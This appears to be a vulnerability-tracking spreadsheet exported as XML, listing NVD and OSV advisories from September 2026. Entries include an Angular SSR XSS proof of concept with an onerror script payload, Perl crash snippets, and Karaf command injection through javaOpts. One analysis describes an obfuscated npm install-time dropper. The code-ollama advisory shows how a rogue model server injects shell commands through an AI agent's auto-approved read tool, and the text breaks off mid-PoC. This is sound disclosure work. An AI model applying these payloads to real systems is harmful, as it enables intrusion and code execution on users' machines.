An XSS vulnerability exists in `@angular/platform-server` during server-side rendering (SSR) HTML serialization of `ProcessingInstruction` DOM nodes (`&lt;?target data?&gt;`, `nodeType === 7`) when nested inside fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`). While processing instruction data escaped `&gt;` to `&amp;gt;`, it did not check for or escape matching closing tags of ancestor fallback elements (e.g., `&lt;/noscript&gt;`). When rendered in a browser with scripting enabled, an unescaped closing tag sequence in a processing instruction prematurely closes the fallback raw-content tag and causes subsequent sibling elements to execute as live HTML.
### Technical Description
In HTML5 parsing, fallback raw-content elements (`&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, `&lt;noframes&gt;`) place the browser's HTML tokenizer into `RAWTEXT` mode. In `RAWTEXT` mode, processing instruction tokens (`&lt;?...?&gt;`) are treated as literal raw text rather than bogus comments, and the parser ignores `&gt;` or `?&gt;`. The only token sequence that terminates the container is an end tag matching the container tag name (`&lt;/noscript`, `&lt;/iframe`, etc.).
During server-side HTML serialization, processing instruction nodes previously only replaced `&gt;` with `&amp;gt;` (preventing bogus comment breakouts in normal HTML data states) but left `&lt;` untouched. Crucially, processing instruction serialization never inspected ancestor fallback raw-content tags. As a result, if a `ProcessingInstruction` node inside `&lt;noscript&gt;` contained `&lt;/noscript ` in its data payload, it was emitted unescaped as `&lt;?x &lt;/noscript ?&gt;`.
### Impact &amp; Reachability
* **Reachability**: Processing instruction nodes cannot be authored directly through standard Angular template syntax (which parses `&lt;?...&gt;` into comment nodes in DOM position). Reaching this vulnerability requires application or library code calling `inject(DOCUMENT).createProcessingInstruction(target, data)` or `Renderer2` DOM insertion methods with untrusted user input passed to `data` inside a fallback raw-content container.
* **Impact**: In applications that programmatically construct processing instruction nodes inside fallback elements during server-side rendering, an attacker controlling the processing instruction data can break out of the container and execute arbitrary JavaScript in victims' browsers.
### Proof of Concept (Minimal Reproduction)
```ts
import { Component, ElementRef, Renderer2, inject, DOCUMENT, AfterViewInit } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;noscript id="host"&gt;&lt;/noscript&gt;`
})
export class AppComponent implements AfterViewInit {
  private r = inject(Renderer2);
  private el = inject(ElementRef);
  private doc = inject(DOCUMENT);
  ngAfterViewInit() {
    const host = this.el.nativeElement.querySelector('#host');
    // Attacker-controlled input passed as Processing Instruction data
    const pi = this.doc.createProcessingInstruction('x', '&lt;/noscript ');
    this.r.appendChild(host, pi);
    // Sibling markup that should remain inert inside &lt;noscript&gt;
    const img = this.r.createElement('img');
    this.r.setAttribute(img, 'src', 'x');
    this.r.setAttribute(img, 'onerror', 'alert("SSR_PI_XSS")');
    this.r.appendChild(host, img);
  }
}
```
**Vulnerable SSR Output**:
```html
&lt;noscript&gt;&lt;?x &lt;/noscript ?&gt;&lt;img src="x" onerror="alert('SSR_PI_XSS')"&gt;&lt;/noscript&gt;
```
### Workarounds
* Avoid passing untrusted user input into `document.createProcessingInstruction(target, data)` when the node is inserted into `&lt;noscript&gt;`, `&lt;iframe&gt;`, `&lt;noembed&gt;`, or `&lt;noframes&gt;` during server-side rendering.
* Manually sanitize or replace `&lt;` with `&amp;lt;` in any untrusted data passed to processing instruction nodes on the server.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88058</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88815</t>
        </is>
      </c>
      <c r="D365" s="5" t="inlineStr"/>
      <c r="E365" s="5" t="inlineStr"/>
      <c r="F365" s="5" t="inlineStr"/>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>DBI versions before 1.654 for Perl incorrectly treat numeric values as strings in sql_type_cast_svpv.
When casting to SQL_NUMERIC, sql_type_cast_svpv passes the string pointer and length of the SV to grok_number without stringifying it first. An integer (IV) or floating-point (NV) value has no valid string pointer, so grok_number reads from an invalid address, triggering a segmentation fault.
This is reachable in Perl using the sql_type_cast function:
  my $num = 42;
  DBI::sql_type_cast( $num, DBI::SQL_NUMERIC, 0 );</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88815</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88816</t>
        </is>
      </c>
      <c r="D366" s="5" t="inlineStr"/>
      <c r="E366" s="5" t="inlineStr"/>
      <c r="F366" s="5" t="inlineStr"/>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>DBI versions before 1.654 for Perl incorrectly treat numeric values as strings in FetchHashKeyName.
fetchrow_hashref uses the string pointer of the FetchHashKeyName attribute as the key name without stringifying it first. When FetchHashKeyName has been set to an integer (IV) or floating-point (NV) value, that pointer is invalid, so reading the key name triggers a segmentation fault.
This can be triggered with the following code:
   my $dbh = DBI-&gt;connect( "dbi:ExampleP:", "", "",
       { RaiseError =&gt; 0, PrintError =&gt; 0 } );
   $dbh-&gt;{FetchHashKeyName} = 42;
   my $sth = $dbh-&gt;prepare("select mode, size, name from .");
   $sth-&gt;execute;
   $sth-&gt;fetchrow_hashref;</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88816</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88932</t>
        </is>
      </c>
      <c r="D367" s="5" t="inlineStr"/>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr">
        <is>
          <t>npm:multer</t>
        </is>
      </c>
      <c r="M367" s="5" t="inlineStr">
        <is>
          <t>2.4.0</t>
        </is>
      </c>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr"/>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>### Impact
Multer's `diskStorage` can leave complete, orphaned files on disk when a multipart upload is aborted in the brief window before the storage engine assigns the file path. This is an incomplete fix of CVE-2026-5038: the earlier cleanup removes only in-flight uploads that already have a path, so an upload aborted inside that window is written to disk with nothing left to remove it, and the application is not given a handle to clean it up. An unauthenticated attacker sending aborted requests to any route backed by disk storage can accumulate orphaned files until the upload directory or the shared system temporary directory is exhausted. An asynchronous `destination` or `filename` widens the window.
### Patches
Users should upgrade to `2.4.0` or higher.
### Workarounds
None.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88932</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9029</t>
        </is>
      </c>
      <c r="D368" s="5" t="inlineStr"/>
      <c r="E368" s="5" t="inlineStr"/>
      <c r="F368" s="5" t="inlineStr"/>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr"/>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>Grafana geomap panel's XYZ tile layer has a sanitize-then-interpolate ordering bug in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9029</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90979</t>
        </is>
      </c>
      <c r="D369" s="5" t="inlineStr"/>
      <c r="E369" s="5" t="inlineStr"/>
      <c r="F369" s="5" t="inlineStr"/>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>sap, gin</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>LDAPCache and LDAPBackingEngine build LDAP search filters for user lookup and role lookup by textually substituting the placeholders %u, %dn, and %fqdn (drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (userFilter, roleFilter). Before the fix, the only sanitization applied to the substituted value was double backslashed:
filter = filter.replaceAll(Pattern.quote("%u"), Matcher.quoteReplacement(user));
filter = filter.replace("\\", "\\\\");
This does not escape the other characters RFC 4515 requires escaping in an LDAP search filter: *, (, ), and NUL. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to.
It's not exploitable through every entry points: LDAPLoginModule and LDAPPubkeyLoginModule both called Util.doRFC2254Encoding() (correct RFC 4515 escaping) on the login name before handing it to LDAPCache, which masked the missing escaping in LDAPCache for those two call paths. Using LDAPCache directly (bypassing the login modules) does not reproduce through the normal LDAPLoginModule/LDAPPubkeyLoginModule authentication flow for this reason. It does reproduce through two other call paths that reach LDAPCache/LDAPBackingEngine without any prior escaping:
  *  GSSAPILdapLoginModule passes the NameCallback name straight through, unescaped.
  *  LDAPBackingEngine (listRoles) passes principal.getName() straight through, unescaped.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90979</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91006</t>
        </is>
      </c>
      <c r="D370" s="5" t="inlineStr"/>
      <c r="E370" s="5" t="inlineStr"/>
      <c r="F370" s="5" t="inlineStr"/>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>Apache Karaf's instance-management service (InstanceServiceImpl) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through /bin/sh (Unix) or cscript (Windows). The caller-supplied javaOpts value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (;, |, `, $(...)) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user.
Reachable via the shell commands instance:create, instance:start, instance:restart, instance:change-opts, and the equivalent InstanceMBean JMX operations (createInstance, startInstance, changeJavaOpts, cloneInstance).
Mitigation   *  Set karaf.secured.command.compulsory.roles=admin in etc/system.properties to close the fail-open gap for all unconfigured command scopes.
  *  Restrict which principals can reach instance:* commands and InstancesMBean via etc/users.properties role assignments.
  *  Treat javaOpts passed to instance:create/instance:start/instance:change-opts/InstancesMBean as untrusted input only from fully-trusted operators.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91006</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91095</t>
        </is>
      </c>
      <c r="D371" s="5" t="inlineStr"/>
      <c r="E371" s="5" t="inlineStr"/>
      <c r="F371" s="5" t="inlineStr"/>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr"/>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>In proxygen from v2024.10.28.00 until v2026.09.28.00, the HTTPTransaction::onWebTransportUniStream and HTTPTransaction::onWebTransportBidiStream APIs could return stream handles that the stream handler had already freed. HQSession then installed those handles as transport read callbacks, which could lead to use of freed memory.</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91095</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91096</t>
        </is>
      </c>
      <c r="D372" s="5" t="inlineStr"/>
      <c r="E372" s="5" t="inlineStr"/>
      <c r="F372" s="5" t="inlineStr"/>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
      <c r="R372" s="5" t="inlineStr"/>
      <c r="S372" s="5" t="inlineStr">
        <is>
          <t>In proxygen from v2024.10.28.00 until v2026.09.28.00, WebTransportImpl::terminateSessionStreams (WebTransportImpl::destroy in releases before v2025.08.18.00) failed to unregister read callbacks for streams that were no longer open before destroying them. The transport could then invoke a read callback that had been freed.</t>
        </is>
      </c>
      <c r="T372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91096</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9162</t>
        </is>
      </c>
      <c r="D373" s="5" t="inlineStr"/>
      <c r="E373" s="5" t="inlineStr"/>
      <c r="F373" s="5" t="inlineStr"/>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="inlineStr"/>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K373" s="5" t="inlineStr"/>
      <c r="L373" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M373" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.5.6+incompatible, 11.6.3+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q373" s="5" t="inlineStr"/>
      <c r="R373" s="5" t="inlineStr"/>
      <c r="S373" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't invalidate cached authentication state for active WebSocket connections during global session revocation in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9162</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96760</t>
        </is>
      </c>
      <c r="D374" s="5" t="inlineStr"/>
      <c r="E374" s="5" t="inlineStr"/>
      <c r="F374" s="5" t="inlineStr"/>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="inlineStr"/>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr"/>
      <c r="K374" s="5" t="inlineStr"/>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q374" s="5" t="inlineStr"/>
      <c r="R374" s="5" t="inlineStr"/>
      <c r="S374" s="5" t="inlineStr">
        <is>
          <t>Authlib (v1.7.2 and below) contains a signature verification bypass vulnerability. The JsonWebSignature.deserialize_json() method accepts a JSON Serialization JWS object and returns the payload as successfully verified without checking for a signature and without requiring a cryptographic key.</t>
        </is>
      </c>
      <c r="T374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96760</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>GHSA-2gr6-gxvx-3594</t>
        </is>
      </c>
      <c r="D375" s="5" t="inlineStr"/>
      <c r="E375" s="5" t="inlineStr"/>
      <c r="F375" s="5" t="inlineStr"/>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="inlineStr"/>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr"/>
      <c r="L375" s="5" t="inlineStr">
        <is>
          <t>npm:nebulajs-api</t>
        </is>
      </c>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q375" s="5" t="inlineStr"/>
      <c r="R375" s="5" t="inlineStr"/>
      <c r="S375" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (07debd960454b52639fee783e21c0c303702d8dce6de5e3320393f1b0abc7077)
package.json declares scripts.preinstall = 'node preinstall.cjs'. preinstall.cjs is a single ~232KB opaque Function(...) invocation containing a custom PRNG-based string decoder (VnDKxn using constants 0x9e3779b9, 0x243f6a88, 0x6a09e667, 0x7f4a7c15) and a ciphertext table (KWlywdS) that is XOR-reconstructed at runtime via Tr8b5jD into executable code. The visible source contains no readable build logic; the entire install-time behavior is materialized from the decoded blob. This is the canonical npm install-time RCE dropper shape: an author-controlled preinstall hook whose destinations, commands, and payload are all hidden behind runtime decoding, executing on the installer's machine at `npm install` time before the user has run any package code. The shipped main module (nebula.js) is a thin AI-client wrapper hardcoding baseUrl https://api.nebulaai.dev/v2, disproportionately small compared to the obfuscated install script, and functions as a cover surface unrelated to the preinstall payload.
## Source: ghsa-malware (8e5df52f8d9581ab8db82a19ed61221cea9967ba53897bb4278838d6ef50063c)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75" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17220</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>GHSA-456v-xq2p-r4cj</t>
        </is>
      </c>
      <c r="D376" s="5" t="inlineStr"/>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="inlineStr"/>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr"/>
      <c r="L376" s="5" t="inlineStr">
        <is>
          <t>npm:code-ollama</t>
        </is>
      </c>
      <c r="M376" s="5" t="inlineStr">
        <is>
          <t>0.36.1</t>
        </is>
      </c>
      <c r="N376" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O376" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P376" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q376" s="5" t="inlineStr"/>
      <c r="R376" s="5" t="inlineStr"/>
      <c r="S376" s="5" t="inlineStr">
        <is>
          <t>## `grep_search` Command Injection via Unescaped `$()` Shell Substitution (CWE-78)
### Summary
The `grep_search` tool in `code-ollama` constructs a shell command string by interpolating attacker-controlled `pattern` and `path` arguments, then executes it via `child_process.exec()`. The sanitization only escapes backslashes and double-quote characters, leaving `$()` command substitution and backtick expansion fully intact. A malicious or compromised Ollama server can therefore inject and execute arbitrary OS commands with the privileges of the local user running `code-ollama`. Because `grep_search` is classified as a read-only tool, it auto-executes in Plan mode without any user approval prompt, making this a no-interaction-required exploitation path. Severity is **High (CVSS 7.8)**.
### Details
**Vulnerable sink — `src/utils/tools/filesystem/grep.ts:58-66`**
```ts
const escapedPattern = searchPattern
  .replace(/\\/g, '\\\\')
  .replace(/"/g, '\\"');
const escapedDirPath = dirPath.replace(/\\/g, '\\\\').replace(/"/g, '\\"');
const { stdout } = await execShell(
  `rg --line-number --no-heading --smart-case "${escapedPattern}" "${escapedDirPath}"`,
);
```
Only `\` and `"` are neutralized. The shell metacharacter sequence `$()` (and backtick-style `` ` `` substitution) is passed through unmodified. The resulting string is passed to `execShell()` (`src/utils/tools/shell.ts:46-49`), which calls `exec` — the promisified `child_process.exec` defined at `src/utils/node.ts:1-4` — causing `/bin/sh` to interpret the entire string and expand any embedded command substitution.
**Full data-flow path (source → sink)**
| Step | Location | Action |
|------|----------|--------|
| 1 | `src/utils/ollama.ts:102-103` | External Ollama chat stream delivers `chunk.message.tool_calls` to the CLI |
| 2 | `src/cli.ts:147-148` | Each `toolCall` is forwarded to `tools.executeToolCall()` |
| 3 | `src/utils/tools/dispatcher.ts:300-306` | Dispatcher normalizes the call and routes it |
| 4 | `src/utils/tools/dispatcher.ts:392-393` | `stringArgs.pattern` and `stringArgs.path` are passed verbatim to `grepSearch()` |
| 5 | `src/utils/tools/filesystem/grep.ts:58-63` | Incomplete sanitization: only `\` and `"` are escaped (**root cause**) |
| 6 | `src/utils/tools/filesystem/grep.ts:65` | Shell command string assembled and handed to `execShell()` (**sink**) |
| 7 | `src/utils/tools/shell.ts:46-49` → `src/utils/node.ts:1-4` | `exec()` (`child_process.exec`) executes the string via `/bin/sh` |
**Approval-bypass amplifier**
`grep_search` is listed in `READ_TOOL_NAMES` at `src/constants/tool.ts:14-20` and is exposed in Plan mode at `src/utils/tools/definitions.ts:225-228`. Read-only tools execute automatically without presenting an approval prompt to the user, so exploitation requires zero user interaction beyond the initial `code-ollama run` invocation.
### PoC
**Prerequisites**
- `code-ollama` v0.36.0 installed (e.g., `npm install --global code-ollama@0.36.0` or built from source via the Dockerfile below).
- `ripgrep` (`rg`) available in `PATH` (the vulnerable code path requires it).
- Python 3 available to run the fake Ollama server.
**Step 1 — Build the self-contained Docker image (recommended)**
```sh
# From the report root directory (where vuln-001/ lives)
